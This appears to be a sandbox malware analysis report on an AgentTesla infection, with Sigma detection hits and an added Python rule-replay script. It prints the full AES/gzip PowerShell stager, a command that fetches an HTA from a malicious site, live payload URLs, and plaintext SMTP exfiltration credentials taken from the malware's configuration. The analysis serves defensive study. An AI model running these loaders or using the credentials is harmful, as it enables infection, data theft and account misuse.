Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $OsFNkdw = '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';$JIfveZK = 'cFRkUGZlWWl4R2ZHdlp1WlRocFlZR3RFVUtmamhETUc=';$UGIWRBAh = New-Object 'System.Security.Cryptography.AesManaged';$UGIWRBAh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$UGIWRBAh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$UGIWRBAh.BlockSize = 128;$UGIWRBAh.KeySize = 256;$UGIWRBAh.Key = [System.Convert]::FromBase64String($JIfveZK);$VpSlE = [System.Convert]::FromBase64String($OsFNkdw);$uBmStTPL = $VpSlE[0..15];$UGIWRBAh.IV = $uBmStTPL;$cLYZAvcnc = $UGIWRBAh.CreateDecryptor();$eVtPpVFwq = $cLYZAvcnc.TransformFinalBlock($VpSlE, 16, $VpSlE.Length - 16);$UGIWRBAh.Dispose();$DaRjcu = New-Object System.IO.MemoryStream( , $eVtPpVFwq );$wDjFzJY = New-Object System.IO.MemoryStream;$MtMSBjEhy = New-Object System.IO.Compression.GzipStream $DaRjcu, ([IO.Compression.CompressionMode]::Decompress);$MtMSBjEhy.CopyTo( $wDjFzJY );$MtMSBjEhy.Close();$DaRjcu.Close();[byte[]] $dVtmfGSE = $wDjFzJY.ToArray();$ghWDGW = [System.Text.Encoding]::UTF8.GetString($dVtmfGSE);$ghWDGW | powershell -, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $OsFNkdw = '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';$JIfveZK = 'cFRkUGZlWWl4R2ZHdlp1WlRocFlZR3RFVUtmamhETUc=';$UGIWRBAh = New-Object 'System.Security.Cryptography.AesManaged';$UGIWRBAh.Mode = [System.Security.Cryptography
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $OsFNkdw = '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';$JIfveZK = 'cFRkUGZlWWl4R2ZHdlp1WlRocFlZR3RFVUtmamhETUc=';$UGIWRBAh = New-Object 'System.Security.Cryptography.AesManaged';$UGIWRBAh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$UGIWRBAh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$UGIWRBAh.BlockSize = 128;$UGIWRBAh.KeySize = 256;$UGIWRBAh.Key = [System.Convert]::FromBase64String($JIfveZK);$VpSlE = [System.Convert]::FromBase64String($OsFNkdw);$uBmStTPL = $VpSlE[0..15];$UGIWRBAh.IV = $uBmStTPL;$cLYZAvcnc = $UGIWRBAh.CreateDecryptor();$eVtPpVFwq = $cLYZAvcnc.TransformFinalBlock($VpSlE, 16, $VpSlE.Length - 16);$UGIWRBAh.Dispose();$DaRjcu = New-Object System.IO.MemoryStream( , $eVtPpVFwq );$wDjFzJY = New-Object System.IO.MemoryStream;$MtMSBjEhy = New-Object System.IO.Compression.GzipStream $DaRjcu, ([IO.Compression.CompressionMode]::Decompress);$MtMSBjEhy.CopyTo( $wDjFzJY );$MtMSBjEhy.Close();$DaRjcu.Close();[byte[]] $dVtmfGSE = $wDjFzJY.ToArray();$ghWDGW = [System.Text.Encoding]::UTF8.GetString($dVtmfGSE);$ghWDGW | powershell -, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $OsFNkdw = 'AAAAAAAAAAAAAAAAAAAAAOeGa50V5wUO7zHydkcFZbJINq4P3H3RMsqOZX56v9Ct1bZUtRZkWxrChczJINV9leAt1ry1WLWkiFuSzfzQFE/yWmqaDZXsneytUPY+5le4m5eM4W+YWzERSnn/urcy8+ZTG58q1h/+BzdOb3w2O1z7QWzthSNzGxOWWNyV7TmYXZCKVR/W4Wq5ilvQCut+dsc1oHeaxo3nDd5I7/VZnRBIlxsN6HcNAACtlxfRiNFMSkDcN8+7W2lqhnFd5fXX+lgvrRG0ld6mdkV9WDBX6QjfiDRmhCmcLWUj1Bf5MNMwFNO28V0dG8tS2l8mIOdvR6aZF2v7aj+0KYrMlbdDhYWFi7OKVRA/3XZLlb5bbQDQE0oOT0JAi3+7gTkWesgJWCHgEueWTWqAMCB6A7qRzrsbpayqU/WAl9/nKC9cB9JhUjr2ITV9Ek3kErAD+eAPojoNd7bQuKjVE9tLoDwyPKo7YLWXTQF8wgZm0Ja3MfKMwkGLjtfBjT7ucygj4kLX/Zk01swB2YhhmuTYGe58LHZYGFngyyCQTKG4k9tN5i5bStEsFZehOTKeivaD+CKVo0hL0r5uz5GQB2ew8dGCUwkPmeXZvkk4B1gaPU3SmBdkVfrvuhGsjc5t6HhSZTvvp6Jz9v2fJj6ahm37dhgqwqsOIhz9dfUsra5c/+Avs0Ho38MGy4FjkP6OU6wM3P9BykwtvTRUlAfl604CotxxEOc6gE6TRnaarDiD6zmwY1sYkKEtTlG2JS0b7n2FWA1GsA==';$JIfveZK = 'cFRkUGZlWWl4R2ZHdlp1WlRocFlZR3RFVUtmamhETUc=';$UGIWRBAh = New-Object 'System.Security.Cryptography.AesManaged';$UGIWRBAh.Mode = [System.Security.Cryptography
Source: Network Connection | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: DestinationIp: 192.185.124.132, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\Public\Libraries\bwsiuvcU.pif, Initiated: true, ProcessId: 6340, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49721
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $OsFNkdw = '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';$JIfveZK = 'cFRkUGZlWWl4R2ZHdlp1WlRocFlZR3RFVUtmamhETUc=';$UGIWRBAh = New-Object 'System.Security.Cryptography.AesManaged';$UGIWRBAh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$UGIWRBAh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$UGIWRBAh.Bl ockSize = 128;$UGIWRBAh.KeySize = 256;$UGIWRBAh.Key = [System.Convert]::FromBase64String($JIfveZK);$VpSlE = [System.Convert]::FromBase64String($OsFNkdw);$uBmStTPL = $VpSlE[0..15];$UGIWRBAh.IV = $uBmStTPL;$cLYZAvcnc = $UGIWRBAh.CreateDecryptor();$eVtPpVFwq = $cLYZAvcnc.TransformFinalBlock($VpSlE, 16, $VpSlE.Length - 16);$UGIWRBAh.Dispose();$DaRjcu = New-Object System.IO.MemoryStream( , $eVtPpVFwq );$wDjFzJY = New-Object System.IO.MemoryStream;$MtMSBjEhy = New-Object System.IO.Compression.GzipStream $DaRjcu, ([IO.Compression.CompressionMode]::Decompress);$MtMSBjEhy.CopyTo( $wDjFzJY );$MtMSBjEhy.Close();$DaRjcu.Close();[byte[]] $dVtmfGSE = $wDjFzJY.ToArray();$ghWDGW = [System.Text.Encoding]::UTF8.GetString($dVtmfGSE);$ghWDGW | powershell -, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $OsFNkdw = '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';$JIfveZK = 'cFRkUGZlWWl4R2ZHdlp1WlRocFlZR3RFVUtmamhETUc=';$UGIWRBAh = New-Object 'System.Security.Cryptography.AesManaged';$UGIWRBAh.Mode = [System.Security.Cryptography
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\Public\Ucvuiswb.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\uc.exe, ProcessId: 8080, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Ucvuiswb
Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: C:\Users\Public\Libraries\bwsiuvcU.pif, CommandLine: C:\Users\Public\Libraries\bwsiuvcU.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\bwsiuvcU.pif, NewProcessName: C:\Users\Public\Libraries\bwsiuvcU.pif, OriginalFileName: C:\Users\Public\Libraries\bwsiuvcU.pif, ParentCommandLine: "C:\Users\user\AppData\Roaming\uc.exe" , ParentImage: C:\Users\user\AppData\Roaming\uc.exe, ParentProcessId: 8080, ParentProcessName: uc.exe, ProcessCommandLine: C:\Users\Public\Libraries\bwsiuvcU.pif, ProcessId: 6340, ProcessName: bwsiuvcU.pif
Source: Process started | Author: Hieu Tran | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $OsFNkdw = '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';$JIfveZK = 'cFRkUGZlWWl4R2ZHdlp1WlRocFlZR3RFVUtmamhETUc=';$UGIWRBAh = New-Object 'System.Security.Cryptography.AesManaged';$UGIWRBAh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$UGIWRBAh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$UGIWRBAh.BlockSize = 128;$UGIWRBAh.KeySize = 256;$UGIWRBAh.Key = [System.Convert]::FromBase64String($JIfveZK);$VpSlE = [System.Convert]::FromBase64String($OsFNkdw);$uBmStTPL = $VpSlE[0..15];$UGIWRBAh.IV = $uBmStTPL;$cLYZAvcnc = $UGIWRBAh.CreateDecryptor();$eVtPpVFwq = $cLYZAvcnc.TransformFinalBlock($VpSlE, 16, $VpSlE.Length - 16);$UGIWRBAh.Dispose();$DaRjcu = New-Object System.IO.MemoryStream( , $eVtPpVFwq );$wDjFzJY = New-Object System.IO.MemoryStream;$MtMSBjEhy = New-Object System.IO.Compression.GzipStream $DaRjcu, ([IO.Compression.CompressionMode]::Decompress);$MtMSBjEhy.CopyTo( $wDjFzJY );$MtMSBjEhy.Close();$DaRjcu.Close();[byte[]] $dVtmfGSE = $wDjFzJY.ToArray();$ghWDGW = [System.Text.Encoding]::UTF8.GetString($dVtmfGSE);$ghWDGW | powershell -, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $OsFNkdw = 'AAAAAAAAAAAAAAAAAAAAAOeGa50V5wUO7zHydkcFZbJINq4P3H3RMsqOZX56v9Ct1bZUtRZkWxrChczJINV9leAt1ry1WLWkiFuSzfzQFE/yWmqaDZXsneytUPY+5le4m5eM4W+YWzERSnn/urcy8+ZTG58q1h/+BzdOb3w2O1z7QWzthSNzGxOWWNyV7TmYXZCKVR/W4Wq5ilvQCut+dsc1oHeaxo3nDd5I7/VZnRBIlxsN6HcNAACtlxfRiNFMSkDcN8+7W2lqhnFd5fXX+lgvrRG0ld6mdkV9WDBX6QjfiDRmhCmcLWUj1Bf5MNMwFNO28V0dG8tS2l8mIOdvR6aZF2v7aj+0KYrMlbdDhYWFi7OKVRA/3XZLlb5bbQDQE0oOT0JAi3+7gTkWesgJWCHgEueWTWqAMCB6A7qRzrsbpayqU/WAl9/nKC9cB9JhUjr2ITV9Ek3kErAD+eAPojoNd7bQuKjVE9tLoDwyPKo7YLWXTQF8wgZm0Ja3MfKMwkGLjtfBjT7ucygj4kLX/Zk01swB2YhhmuTYGe58LHZYGFngyyCQTKG4k9tN5i5bStEsFZehOTKeivaD+CKVo0hL0r5uz5GQB2ew8dGCUwkPmeXZvkk4B1gaPU3SmBdkVfrvuhGsjc5t6HhSZTvvp6Jz9v2fJj6ahm37dhgqwqsOIhz9dfUsra5c/+Avs0Ho38MGy4FjkP6OU6wM3P9BykwtvTRUlAfl604CotxxEOc6gE6TRnaarDiD6zmwY1sYkKEtTlG2JS0b7n2FWA1GsA==';$JIfveZK = 'cFRkUGZlWWl4R2ZHdlp1WlRocFlZR3RFVUtmamhETUc=';$UGIWRBAh = New-Object 'System.Security.Cryptography.AesManaged';$UGIWRBAh.Mode = [System.Security.Cryptography
Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7800, TargetFilename: C:\Users\user\AppData\Roaming\uc.exe
Source: Network Connection | Author: frack113 | Data: DestinationIp: 192.185.124.132, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\Public\Libraries\bwsiuvcU.pif, Initiated: true, ProcessId: 6340, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49721
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://www.sessosesso.it/assets/aw/yt.hta, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://www.sessosesso.it/assets/aw/yt.hta, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://www.sessosesso.it/assets/aw/yt.hta, ProcessId: 5632, ProcessName: powershell.exe
Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7612, ProcessName: svchost.exe
                    No Snort rule has matched
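Taken one at a time the Sigma hits above are noisy (base64 in a PowerShell command line, a Run key, an SMTP connection); what makes this report conclusive is the chain they form: a LNK-launched PowerShell that resolves mshta.exe through a registry wildcard instead of naming it, mshta fetching an HTA, an AES/gzip stager, a PE written by PowerShell into AppData, a .pif executed from C:\Users\Public\Libraries, a Run key pointing at a .url in C:\Users\Public, and an outbound connection to port 587 from that .pif. The script below is an added example, not Joe Sandbox's or the Sigma project's code. It replays that chain as constructed Sysmon-style events built from the report's PIDs, paths, URL and command-line fragments (the stager one-liner is abbreviated) and runs simplified rule bodies over them. Each rule is my approximation of the intent of the Sigma rule it is named after, not that rule's actual selector, and the two rules without a Sigma counterpart in the report (the registry-wildcard lookup and mshta with a URL argument) are my own.

```python
"""Replay the execution chain from this report as Sysmon-style events and run
simplified detections over them.

Added example, not Joe Sandbox's or Sigma's code: rule bodies approximate the
intent of the Sigma rules they are named after; EVENTS is constructed from the
report's process tree and System Summary rows.
"""
import re

PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
MSHTA = "C:\\Windows\\System32\\mshta.exe"
UC = "C:\\Users\\user\\AppData\\Roaming\\uc.exe"
PIF = "C:\\Users\\Public\\Libraries\\bwsiuvcU.pif"
HTA_URL = "https://www.sessosesso.it/assets/aw/yt.hta"
# The LNK never names mshta.exe: it is resolved from a wildcard registry path.
LNK_CMD = f'"{PS}" .(gp -pa \'HKLM:\\SOF*\\Clas*\\Applications\\msh*e\').(\'PSChildName\'){HTA_URL}'
STAGER_CMD = (  # abbreviated form of the report's second-stage one-liner
    f'"{PS}" -w 1 -ep Unrestricted -nop $OsFNkdw = \'<base64 ciphertext>\';'
    "$JIfveZK = 'cFRkUGZlWWl4R2ZHdlp1WlRocFlZR3RFVUtmamhETUc=';"
    "$UGIWRBAh.Key = [System.Convert]::FromBase64String($JIfveZK);"
    "$MtMSBjEhy = New-Object System.IO.Compression.GzipStream $DaRjcu, "
    "([IO.Compression.CompressionMode]::Decompress);$ghWDGW | powershell -"
)

EVENTS = [  # constructed from the report's process tree and Sigma rows
    {"type": "process", "pid": 5632, "image": PS, "parent_image": "", "cmdline": LNK_CMD},
    {"type": "process", "pid": 7260, "image": MSHTA, "parent_image": PS, "cmdline": f'"{MSHTA}" {HTA_URL}'},
    {"type": "process", "pid": 7688, "image": PS, "parent_image": MSHTA, "cmdline": STAGER_CMD},
    {"type": "file", "pid": 7800, "image": PS, "target": UC},
    {"type": "registry", "pid": 8080, "image": UC,
     "target": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Ucvuiswb",
     "details": "C:\\Users\\Public\\Ucvuiswb.url"},
    {"type": "process", "pid": 6340, "image": PIF, "parent_image": UC, "cmdline": PIF},
    {"type": "network", "pid": 6340, "image": PIF, "dst_ip": "192.185.124.132", "dst_port": 587},
]

PUBLIC_DIR = "c:\\users\\public\\"
ODD_EXTENSIONS = (".pif", ".scr", ".com", ".cpl")
MAIL_PORTS = {25, 465, 587}


def _low(value):
    return (value or "").lower()


def rules_for(ev: dict) -> set:
    """Names of the (simplified) rules that fire for one event."""
    hits = set()
    image, parent, cmd = _low(ev.get("image")), _low(ev.get("parent_image")), ev.get("cmdline", "")
    if ev["type"] == "process":
        if image.endswith("\\powershell.exe"):
            if parent.endswith("\\mshta.exe"):
                hits.add("Suspicious MSHTA Child Process")
            if re.search(r"-e(?:p|xecutionpolicy)\s+(?:unrestricted|bypass)", cmd, re.I):
                hits.add("Change PowerShell Policies to an Insecure Level")
            if "frombase64string" in cmd.lower():
                hits.add("PowerShell Base64 Encoded FromBase64String Cmdlet")
            if "gzipstream" in cmd.lower():
                hits.add("Gzip Archive Decode Via PowerShell")
            if re.search(r"\.\(gp\b.*\bPSChildName\b", cmd, re.I):
                hits.add("LOLBin name resolved via registry wildcard")
        if image.endswith("\\mshta.exe") and re.search(r"https?://", cmd, re.I):
            hits.add("MSHTA launched with remote URL")
        if image.startswith(PUBLIC_DIR):
            hits.add("Execution from Suspicious Folder")
        if image.endswith(ODD_EXTENSIONS):
            hits.add("Execution of Suspicious File Type Extension")
    elif ev["type"] == "registry":
        if "\\currentversion\\run\\" in _low(ev.get("target")):
            hits.add("CurrentVersion Autorun Keys Modification")
            if _low(ev.get("details")).startswith(PUBLIC_DIR):
                hits.add("New RUN Key Pointing to Suspicious Folder")
    elif ev["type"] == "file":
        if image.endswith("\\powershell.exe") and _low(ev.get("target")).endswith((".exe", ".dll")):
            hits.add("Potential Binary Or Script Dropper Via PowerShell")
    elif ev["type"] == "network":
        if ev.get("dst_port") in MAIL_PORTS and not image.startswith("c:\\program files"):
            hits.add("Suspicious Outbound SMTP Connections")
        if image.startswith(PUBLIC_DIR):
            hits.add("Suspicious Program Location with Network Connections")
    return hits


def run_rules(events) -> set:
    """All (rule name, pid) pairs across an event list."""
    return {(rule, ev["pid"]) for ev in events for rule in rules_for(ev)}


if __name__ == "__main__":
    for rule, pid in sorted(run_rules(EVENTS), key=lambda h: (h[1], h[0])):
        print(f"{pid:>5}  {rule}")
```

`run_rules` returns (rule, pid) pairs so the output can be pivoted by process; the event fields map onto Sysmon event IDs 1, 3, 11 and 13, which are the EventIDs the network, file and registry rows above cite, so the same functions can be pointed at real Sysmon exports once the field names are adapted.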


                    AV Detection

Source: FT. 40FE CNY .xlsx.lnk | Avira: detected
Source: http://pesterbdd.com/images/Pester.png | URL Reputation: Label: malware
Source: https://www.sessosesso.it/assets/aw/uc.exe | Avira URL Cloud: Label: malware
Source: cmd.exe.5360.20.memstrmin | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "mail.irmaklarpaslanmaz.com.trB", "Username": "muhasebe@irmaklarpaslanmaz.com.tr", "Password": "MH5473588PmZ&"}
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF | ReversingLabs: Detection: 58%
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF | Virustotal: Detection: 38%
Source: C:\Users\Public\Libraries\netutils.dll | ReversingLabs: Detection: 28%
Source: C:\Users\Public\Libraries\netutils.dll | Virustotal: Detection: 47%
Source: C:\Users\user\AppData\Roaming\uc.exe | ReversingLabs: Detection: 58%
Source: C:\Users\user\AppData\Roaming\uc.exe | Virustotal: Detection: 38%
Source: FT. 40FE CNY .xlsx.lnk | ReversingLabs: Detection: 31%
Source: FT. 40FE CNY .xlsx.lnk | Virustotal: Detection: 24%
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\uc.exe | Joe Sandbox ML: detected
Source: FT. 40FE CNY .xlsx.lnk | Joe Sandbox ML: detected

                    Compliance

Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Unpacked PE file: 23.2.bwsiuvcU.pif.400000.0.unpack
Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Unpacked PE file: 25.2.bwsiuvcU.pif.400000.0.unpack
Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Unpacked PE file: 27.2.bwsiuvcU.pif.400000.0.unpack
Source: unknown; HTTPS traffic detected: 89.46.106.29:443 -> 192.168.2.7:49705 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 89.46.106.29:443 -> 192.168.2.7:49710 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 89.46.106.29:443 -> 192.168.2.7:49712 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 89.46.106.29:443 -> 192.168.2.7:49713 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49716 version: TLS 1.2
                    Source: Binary string: calc.pdbGCTL source: mshta.exe, 00000009.00000003.1852414679.0000019AC1771000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1855006902.000001A2C46D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852363981.000001A2C46CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1863703689.0000019AC1772000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852558870.000001A2C46E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852439079.000001A2C46DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1851615477.000001A2C4722000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852067245.000001A2C4393000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1865516494.000001A2C46F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852507533.000001A2C4710000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852261324.000001A2C46D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852234112.000001A2C438F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852117667.0000019AC1757000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1851691454.000001A2C438D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1853065476.000001A2C46E5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1865380060.000001A2C46D1000.00000004.00000020.00020000.00000000.sdmp, yt[1].hta.9.dr
                    Source: Binary string: PSReadline.pdbaK source: powershell.exe, 00000011.00000002.1635136687.0000029E326E4000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: mscorlib.pdb source: powershell.exe, 00000011.00000002.1629294581.0000029E323A0000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: easinvoker.pdb source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp, easinvoker.exe.19.dr
                    Source: Binary string: _.pdb source: bwsiuvcU.pif, 00000017.00000002.1680345757.000000003DA95000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000003.1516343993.000000003BDC9000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1681909755.0000000040260000.00000004.08000000.00040000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1681582310.000000003EDE1000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1787983024.0000000025D95000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1791650361.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000003.1634916828.0000000023FF4000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1790805820.0000000026F71000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2555827704.0000000040350000.00000004.08000000.00040000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000003.1719620200.000000003BD8F000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2554498447.000000003DA65000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2555544877.000000003ED31000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: calc.pdb source: mshta.exe, 00000009.00000003.1852414679.0000019AC1771000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1855006902.000001A2C46D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852363981.000001A2C46CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1863703689.0000019AC1772000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852067245.000001A2C4393000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852117667.0000019AC1757000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1851691454.000001A2C438D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1865380060.000001A2C46D1000.00000004.00000020.00020000.00000000.sdmp, yt[1].hta.9.dr
                    Source: Binary string: easinvoker.pdbH source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1514685918.0000000014B20000.00000004.00000020.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp, easinvoker.exe.19.dr
                    Source: Binary string: owershell.PSReadline.pdb source: powershell.exe, 00000011.00000002.1629294581.0000029E32432000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Roaming\uc.exe; Code function: 19_2_029858CC GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 19_2_029858CC
Source: C:\Users\user\AppData\Roaming\uc.exe; Code function: 19_2_0299C8AC InternetCheckConnectionA, 19_2_0299C8AC
Source: global traffic; HTTP traffic detected: GET /assets/aw/Book1.xlsx HTTP/1.1; Host: sessosesso.it; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /assets/aw/uc.exe HTTP/1.1; Host: www.sessosesso.it; Connection: Keep-Alive
Source: Joe Sandbox View; IP Address: 13.107.139.11
Source: Joe Sandbox View; ASN Name: UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View; ASN Name: ARUBA-ASNIT
Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View; JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View; JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic; HTTP traffic detected: GET /assets/aw/yt.hta HTTP/1.1; Accept: */*; Accept-Language: en-CH; UA-CPU: AMD64; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729); Host: www.sessosesso.it; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /download?resid=849ABDB14CA5CEC3%21220&authkey=!AGW69_d3Nli6r4Y HTTP/1.1; Connection: Keep-Alive; Accept: */*; User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5); Host: onedrive.live.com
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
